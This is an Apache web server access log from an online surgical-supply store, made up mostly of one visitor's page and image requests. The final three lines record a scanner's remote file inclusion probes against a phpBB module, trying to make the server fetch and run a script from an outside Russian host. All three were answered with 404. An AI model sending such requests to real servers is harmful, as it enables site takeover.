76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:16 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4214C972005F8800D+M37+ENG HTTP/1.1" 200 38469 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:32 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4217091200678800D+M37+ENG HTTP/1.1" 200 39061 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4214C972005F8800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4915B9B200CCD800D+M37+ENG HTTP/1.1" 200 39061 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4217091200678800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:55 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4915B9B200CCD800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:24:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:07 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4915B9B200CCD800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:08 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4915B9B200CCD800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:08 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4915B9B200CCD800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG HTTP/1.1" 200 76797 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:15 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:16 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG HTTP/1.1" 200 37522 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A401E591200E5D800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:28 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:25:29 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5A4D1A493200F6F800D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
222.122.72.216 - - [13/Oct/2009:01:26:17 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.72.216 - - [13/Oct/2009:01:26:17 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [13/Oct/2009:01:26:17 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
